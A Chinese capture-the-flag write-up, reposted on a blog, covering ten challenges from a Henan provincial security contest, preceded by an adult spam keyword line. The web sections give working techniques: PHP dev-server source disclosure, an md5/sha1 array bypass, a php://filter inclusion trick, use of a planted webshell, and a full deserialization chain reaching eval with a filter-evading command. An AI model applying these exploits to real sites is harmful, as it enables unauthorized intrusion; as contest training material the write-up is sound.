国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

  1. Toy模板網(wǎng)首頁
  2. >Toy博客

河南省第五屆“金盾信安杯”網(wǎng)絡(luò)與數(shù)據(jù)安全大賽-WP

2年前作者:tlp_zzm分類:Toy博客閱讀(34)違法舉報(bào)

這篇具有很好參考價(jià)值的文章主要介紹了河南省第五屆“金盾信安杯”網(wǎng)絡(luò)與數(shù)據(jù)安全大賽-WP。希望對(duì)大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請(qǐng)大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問。

師傅們,我太菜了,除了最后一個(gè)小時(shí)都還在前20名,結(jié)果最后一個(gè)小時(shí)被踢下去了,做了一道少解的題目也掩飾潰敗,被打服了,直接被踢出前40名,babyrsa到底怎么解,嗚嗚!被打服了!!!!!!!以下是我們隊(duì)伍的10道題目的wp。

題目一 Crypto-我看看誰還不會(huì)RSA

操作內(nèi)容:

看到該題之后發(fā)現(xiàn)是私鑰加密,公鑰解密

腳本代碼:

from Crypto.Util.number import *

c=8232151627233115772131180151146951323147507324390914513031444555762539986162650

p=8666789885346075954502743436174521501697

q=2449101960789395782044494299423558347143

n = p*q

phin = (p-1)*(q-1)

e=37777

m = pow(c,e,n)

print(long_to_bytes(m))

河南省第五屆“金盾信安杯”網(wǎng)絡(luò)與數(shù)據(jù)安全大賽-WP,android

flag值:

flag{r5a_Who_w0nt}

題目二 Misc-來都來了

操作內(nèi)容:

打開壓縮包發(fā)現(xiàn)有密碼

用010工具打開發(fā)現(xiàn)是偽加密

河南省第五屆“金盾信安杯”網(wǎng)絡(luò)與數(shù)據(jù)安全大賽-WP,android

把09改為00,之后即可解壓縮,壓縮之后的內(nèi)容為

河南省第五屆“金盾信安杯”網(wǎng)絡(luò)與數(shù)據(jù)安全大賽-WP,android

Base64解密之后把解密內(nèi)容縮小

河南省第五屆“金盾信安杯”網(wǎng)絡(luò)與數(shù)據(jù)安全大賽-WP,android

flag值:

flag{cp2ae315-eef4-3fra-a768-cd9xb19cdk4e}

題目三 Cypto-hakiehs

操作內(nèi)容:

通過圖片形式打開,有3種類型的密碼

河南省第五屆“金盾信安杯”網(wǎng)絡(luò)與數(shù)據(jù)安全大賽-WP,android

在網(wǎng)上查找到了3種密碼對(duì)應(yīng)的密碼表

河南省第五屆“金盾信安杯”網(wǎng)絡(luò)與數(shù)據(jù)安全大賽-WP,android

河南省第五屆“金盾信安杯”網(wǎng)絡(luò)與數(shù)據(jù)安全大賽-WP,android

河南省第五屆“金盾信安杯”網(wǎng)絡(luò)與數(shù)據(jù)安全大賽-WP,android

對(duì)應(yīng)密碼表得到相應(yīng)的字母是linkzeldadanon及為flag

flag值:

flag{linkzeldaganon}

題目四 Misc-Honor

操作內(nèi)容:

foremost分離圖片:foremost -T 圖片

河南省第五屆“金盾信安杯”網(wǎng)絡(luò)與數(shù)據(jù)安全大賽-WP,android

河南省第五屆“金盾信安杯”網(wǎng)絡(luò)與數(shù)據(jù)安全大賽-WP,android

發(fā)現(xiàn)有一個(gè)jpg文件

用stegdetect分析存在隱寫

河南省第五屆“金盾信安杯”網(wǎng)絡(luò)與數(shù)據(jù)安全大賽-WP,android

用stegseek使用rockyou輸入命令爆破密碼

河南省第五屆“金盾信安杯”網(wǎng)絡(luò)與數(shù)據(jù)安全大賽-WP,android

進(jìn)行柵欄w型解密

河南省第五屆“金盾信安杯”網(wǎng)絡(luò)與數(shù)據(jù)安全大賽-WP,android

flag值:

flag{424c076e-768c-3636-acb5-4676900b9eec}

題目五 get_source

操作內(nèi)容:

訪問頁面發(fā)現(xiàn)無內(nèi)容,但通過返回包可發(fā)現(xiàn)php版本7.4.21

可利用Development Server源碼泄露漏洞源碼泄露漏洞

河南省第五屆“金盾信安杯”網(wǎng)絡(luò)與數(shù)據(jù)安全大賽-WP,android

得到源碼后分析,md5和sha1可用數(shù)組繞過

post傳參a[]=1&b[]=2&pwn[]=1 訪問頁面得到flag

河南省第五屆“金盾信安杯”網(wǎng)絡(luò)與數(shù)據(jù)安全大賽-WP,android

flag值:

動(dòng)態(tài)flag不給了

題目六 Web-ApeCoin

操作內(nèi)容:

頁面無明顯漏洞點(diǎn) 考慮源碼泄露

訪問/www.tar.gz發(fā)現(xiàn)源碼泄露

在static/font目錄下發(fā)現(xiàn)可疑文件.txt.php

打開后發(fā)現(xiàn)為冰蝎馬

河南省第五屆“金盾信安杯”網(wǎng)絡(luò)與數(shù)據(jù)安全大賽-WP,android

根據(jù)特征解密得到鏈接密碼74658263

冰蝎鏈接找到flag

河南省第五屆“金盾信安杯”網(wǎng)絡(luò)與數(shù)據(jù)安全大賽-WP,android

flag值:

flag{59366e97-4d45-4338-9056-4f06b0493df2}

題目七 Web-Easyphp

操作內(nèi)容:

進(jìn)入頁面發(fā)現(xiàn)require_once文件包含

但flag.php已被包含過一次

用偽協(xié)議配合多級(jí)符號(hào)鏈接的辦法進(jìn)行繞過

php://filter/convert.base64-encode/resource=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/usr/share/nginx/html/index.php

但是發(fā)現(xiàn)flag為假

河南省第五屆“金盾信安杯”網(wǎng)絡(luò)與數(shù)據(jù)安全大賽-WP,android

之后考慮包含頁面出現(xiàn)的hint.php

發(fā)現(xiàn)該頁面反序列化命令執(zhí)行

源代碼為

<?php

error_reporting(0);

class mouse

{

??? public $rice;

??? function __isset($n){

??????? $this->rice->nothing();

??? }

}

class dog

{

??? public $a;

??? public $b;

??? public $c;

??? function __wakeup(){

??????? $this->a = 'chance?';

??? }

??? function __destruct(){

??????? $this->b = $this->c;

??????? die($this->a);

??? }

}

class ct

{

??? public $fish;

??? function __toString()

??? {

??????? if(isset($this->fish->d))

??????? {

??????????? echo 'you wrong';

??????? }

??? }

}

class get

{

??? public $cmd;

??? function __call($name,$no)

??? {

??????? eval($this->cmd);

??? }

}

$pop = $_GET['pop'];

if (!preg_match('/sys|pas|read|file|ls|cat|tac|head|tail|more|less|base|echo|cp|\$|\*|\+|\^|scan|current|chr|crypt|show_source|high|readgzfile|dirname|time|next|all|hex2bin|im|shell/i',$pop)){

??? echo "you will get flag".'</br>';

??? unserialize($pop);

}

else{

??? die("Try again!");

}

分析反序化鏈

從 dog->ct->mouse->get構(gòu)造 payload 繞過正則

編寫反序列化腳本

<?php

class mouse

{

??? public $rice;

??? function __construct()

??? {

??????? $this->rice = new get;

??? }

}

class dog

{

??? public $a;

??? public $b;

??? public $c;

??? function __construct()

??? {

??????? $this->a = 'chance?';

??????? $this->b = &$this->a;

??????? $this->c = new ct;

??? }

}

class ct

{

??? public $fish;

??? function __construct()

??? {

??????? $this->fish = new mouse;

??? }

}

class get

{

??? public $cmd;

??? function __construct()

??? {

??????? $this->cmd = 'print(`c\at /realflag/you_want_flag.php`);';

??? }

}

print_r(serialize(new dog));

運(yùn)行得到

O:3:"dog":3:{s:1:"a";s:7:"chance?";s:1:"b";R:2;s:1:"c";O:2:"ct":1:{s:4:"fish";O:5:"mouse":1:{s:4:"rice";O:3:"get":1:{s:3:"cmd";s:42:"print(`c\at /realflag/you_want_flag.php`);";}}}}

傳參后f12得到flag

河南省第五屆“金盾信安杯”網(wǎng)絡(luò)與數(shù)據(jù)安全大賽-WP,android

flag值:

動(dòng)態(tài)flag,不給了

題目八 ezupload

操作內(nèi)容:

爆破目錄發(fā)現(xiàn)/flag目錄下有內(nèi)容

訪問發(fā)現(xiàn)為flag

河南省第五屆“金盾信安杯”網(wǎng)絡(luò)與數(shù)據(jù)安全大賽-WP,android

flag值:

flag{4a384594-7550-4544-b256-66d18640a478}

題目九 Crypto-font

操作內(nèi)容:腦洞一套炸了

打開圖片詳細(xì)信息

河南省第五屆“金盾信安杯”網(wǎng)絡(luò)與數(shù)據(jù)安全大賽-WP,android

◎???¤?♀??§??????♂¤??????§◎????????√

???√?◎??♂?√????????√???♂????

通過在瀏覽器上發(fā)現(xiàn)了一句英文串描述該圖片

河南省第五屆“金盾信安杯”網(wǎng)絡(luò)與數(shù)據(jù)安全大賽-WP,android

theQuickbrownfoxjumpsoverthelazydog,

發(fā)現(xiàn)與◎???¤?♀??§??????♂¤??????§◎????????√一一對(duì)應(yīng)正好36個(gè)

字母表為

√:g;?:0;?? d;?? y;?? z;?? a;?? l;? e;? h;◎? t;§? r;?? e;?? v;?? o;?? s;? p;?? m;¤? u;♂? j;? x;? o;?? f;?? n;?? w;? o;§? r;?? b;?? k;♀? c;?? i;¤ u;? q;?? e;? h;◎? t

根據(jù)???√?◎??♂?√????????√???♂????一一對(duì)應(yīng)到字母表上

是qtsyjfgvbndhflhgfnmjfhko就是flag

flag值:

flag{qtsyjfgvbndhflhgfnmjfhko}

題目十 Misc-芙寧娜

操作內(nèi)容:

某電信原題,最后8e8f,不好多說,之前的wp也可水

'ZmxhZ3tiYzgzOTRhYS03ZTMyLTQ3ZTgtYTlmZC0xYmY2ODNhZg=='

河南省第五屆“金盾信安杯”網(wǎng)絡(luò)與數(shù)據(jù)安全大賽-WP,android

河南省第五屆“金盾信安杯”網(wǎng)絡(luò)與數(shù)據(jù)安全大賽-WP,android

flag{bc8394aa-7e32-47e8-a9fd-1bf683af

通過ps的元數(shù)據(jù)可以得到被遮蓋的16進(jìn)制編碼,通過重組還原得到?個(gè)pyc??件,pyc隱寫得到8e8f}?

拼接可得flag

第二種方法:

爆破找?guī)讉€(gè)慢慢提交,反正沒有提交限制,就是流量大,比賽時(shí)候,真的只有這個(gè)方法最實(shí)用

import string

chars = string.ascii_lowercase + string.digits
flag = "flag{bc8394aa-7e32-47e8-a9fd-1bf683af"

with open(r"C:\Users\Administrator\Desktop\23.txt", "w") as file:
??? for a in chars:
??????? for b in chars:
??????????? for c in chars:
??????????????? for d in chars:
??????????????????? current_flag = flag + a + b + c + d + "}"
??????????????????? file.write(current_flag + "\n")

print("結(jié)果已保存在桌面上")

爆破腳本附上!

flag值:

flag{bc8394aa-7e32-47e8-a9fd-1bf683af8e8f}文章來源地址http://www.zghlxwxcb.cn/news/detail-758380.html

到了這里,關(guān)于河南省第五屆“金盾信安杯”網(wǎng)絡(luò)與數(shù)據(jù)安全大賽-WP的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場(chǎng)。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請(qǐng)注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請(qǐng)點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • 【河南省第二屆技能大賽-物聯(lián)網(wǎng)技術(shù)】C模塊Python開發(fā)講解

    【河南省第二屆技能大賽-物聯(lián)網(wǎng)技術(shù)】C模塊Python開發(fā)講解

    這是基于樣題進(jìn)行講解的文章,因?yàn)檎劫愵}尚未公布和樣題類型相似。文章結(jié)尾提供了源碼和環(huán)境鏈接,讀者可以自行下載以進(jìn)行更深入的學(xué)習(xí)和優(yōu)化。 注意:題目中的API鏈接,是在比賽局域網(wǎng)環(huán)境下進(jìn)行的,在平常練習(xí)的時(shí)候,用新大陸官方鏈接即可! 鏈接:新大陸官

    2024年02月01日
    瀏覽(40)
  • 【附源碼】基于flask框架基于微信小程序的河南省美食分享平臺(tái) 后臺(tái)(python+mysql+論文)

    【附源碼】基于flask框架基于微信小程序的河南省美食分享平臺(tái) 后臺(tái)(python+mysql+論文)

    本系統(tǒng)(程序+源碼)帶文檔lw萬字以上 ? 文末可獲取本課題的源碼和程序 選題背景: 隨著移動(dòng)互聯(lián)網(wǎng)的飛速發(fā)展,微信小程序以其無需下載安裝、使用方便的特點(diǎn),逐漸成為人們?nèi)粘I钪蝎@取信息和進(jìn)行交流的重要工具。特別是在美食分享領(lǐng)域,人們對(duì)各地特色美食的了

    2024年04月27日
    瀏覽(21)
  • 第五屆傳智杯-初賽【B組-題解】

    第五屆傳智杯-初賽【B組-題解】

    在宇宙射線的轟擊下,蓮子電腦里的一些她自己預(yù)定義的函數(shù)被損壞了。 對(duì)于一名理科生來說,各種軟件在學(xué)習(xí)和研究中是非常重要的。為了盡快恢復(fù)她電腦上的軟件的正常使用,她需要盡快地重新編寫這么一些函數(shù)。 你只需輸出fun(a,b)?的值。 共一行兩個(gè)整數(shù)?a,b。 共一行

    2024年02月05日
    瀏覽(17)

  • HNUCM信息科學(xué)與工程學(xué)院第五屆大學(xué)生程序設(shè)計(jì)競(jìng)賽——正式賽

    簽到題 簡(jiǎn)單dp,取前面第五天的3倍就行 這題被封了不記得什么題了 枚舉然后判斷回文就行了 簡(jiǎn)單dp,不能跳的位置置0 算是一個(gè)簡(jiǎn)單思維題吧,先考慮偶奇依次排列,然后發(fā)現(xiàn)可能會(huì)剩下偶數(shù)或者奇數(shù)。 如果剩下的是偶數(shù),因?yàn)榕紨?shù)不會(huì)影響前面的奇偶性,所以在末尾首先

    2024年02月08日
    瀏覽(19)
  • 【IEEE會(huì)議】第五屆信息與計(jì)算機(jī)前沿技術(shù)國際學(xué)術(shù)會(huì)議(ICFTIC 2023)

    【IEEE會(huì)議】第五屆信息與計(jì)算機(jī)前沿技術(shù)國際學(xué)術(shù)會(huì)議(ICFTIC 2023)

    第五屆信息與計(jì)算機(jī)前沿技術(shù)國際學(xué)術(shù)會(huì)議(ICFTIC 2023) 2023 5th International Conference on Frontiers Technology of Information and Computer? 第五屆信息與計(jì)算機(jī)前沿技術(shù)國際學(xué)術(shù)會(huì)議(ICFTIC 2023)將在中國青島舉行, 會(huì)期是2023年11月17-19日, 為期三天, 本次會(huì)議是由中國石油大學(xué)(華東)主辦,

    2024年02月10日
    瀏覽(66)

  • 第五屆湖北省大學(xué)生程序設(shè)計(jì)競(jìng)賽(HBCPC 2023)vp賽后補(bǔ)題

    思路: 數(shù)位dp,如果我們暴力的計(jì)算的狀態(tài)的話,顯然就是記錄每個(gè)數(shù)字出現(xiàn)幾次。但是顯然這樣難以發(fā)揮數(shù)位dp的記憶化功效,因?yàn)橹挥谐霈F(xiàn)次數(shù)相同,你是什么數(shù)字,實(shí)際是無所謂的。所以我們嘗試記錄每個(gè)出現(xiàn)次數(shù)有多少個(gè)數(shù)字 嘗試打表發(fā)現(xiàn),結(jié)果只有1477種 所以,對(duì)

    2024年02月07日
    瀏覽(28)
  • TPU編程競(jìng)賽|Stable Diffusion大模型巔峰對(duì)決,第五屆全球校園人工智能算法精英賽正式啟動(dòng)!

    TPU編程競(jìng)賽|Stable Diffusion大模型巔峰對(duì)決,第五屆全球校園人工智能算法精英賽正式啟動(dòng)!

    目錄 賽題介紹 賽題背景 賽題任務(wù) 賽程安排 評(píng)分機(jī)制 獎(jiǎng)項(xiàng)設(shè)置 ????????近日,2023第五屆全球校園人工智能算法精英賽正式開啟報(bào)名。作為賽題合作方,算豐承辦了“算法專項(xiàng)賽”賽道,提供賽題 「面向Stable Diffusion的圖像提示語優(yōu)化」 ,同時(shí)為參賽選手提供了豐富的云

    2024年02月08日
    瀏覽(21)
  • 通付盾受邀出席區(qū)塊鏈技術(shù)和應(yīng)用峰會(huì)暨第五屆中國區(qū)塊鏈開發(fā)大賽成果發(fā)布會(huì)及頒獎(jiǎng)儀式

    通付盾受邀出席區(qū)塊鏈技術(shù)和應(yīng)用峰會(huì)暨第五屆中國區(qū)塊鏈開發(fā)大賽成果發(fā)布會(huì)及頒獎(jiǎng)儀式

    由江蘇省工業(yè)和信息化廳、中國電子技術(shù)標(biāo)準(zhǔn)化研究院聯(lián)合舉辦的“標(biāo)準(zhǔn)引領(lǐng)、創(chuàng)新驅(qū)動(dòng)”第五屆中國區(qū)塊鏈開發(fā)大賽成果發(fā)布會(huì)在蘇州隆重召開。 通付盾受邀參與此次盛會(huì), 【基于區(qū)塊鏈的“數(shù)信云”安全應(yīng)用與服務(wù)平臺(tái)】獲得“江蘇省區(qū)塊鏈產(chǎn)業(yè)發(fā)展試點(diǎn)示范項(xiàng)目”榮

    2024年02月16日
    瀏覽(33)
  • 金盾加密視頻破解翻錄限制工具使用教程

    金盾加密視頻破解翻錄限制工具使用教程

    最近在研究金盾的加密視頻。想用錄屏軟件錄制為mp4格式的視頻。方便在別的機(jī)器觀看。 發(fā)現(xiàn)一旦打開金盾的播放器。然后再打開錄屏工具就會(huì)被檢測(cè)。然后錄屏工具會(huì)強(qiáng)制關(guān)閉。 所以我研發(fā)了一款工具,可以直接破解播放器檢測(cè)錄屏工具。然后就可以快樂的翻錄了。 ?下

    2024年02月13日
    瀏覽(130)
  • 金盾2016(正陽版)播放器機(jī)器碼替換

    金盾2016(正陽版)播放器機(jī)器碼替換

    參考鏈接:金盾2016加密視頻替換機(jī)器碼實(shí)現(xiàn)多機(jī)播放_(tái)嗶哩嗶哩_bilibili 詳解金盾2016替換機(jī)器碼的幾個(gè)關(guān)鍵步驟_fruits360的博客-CSDN博客_替換機(jī)器碼 之前學(xué)習(xí)下載的視頻,采用金盾加密,有機(jī)器碼和播放密碼,但是可能因?yàn)橹匮b系統(tǒng)導(dǎo)致機(jī)器碼變了,原來播放密碼無法播放,通

    2023年04月09日
    瀏覽(129)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請(qǐng)作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包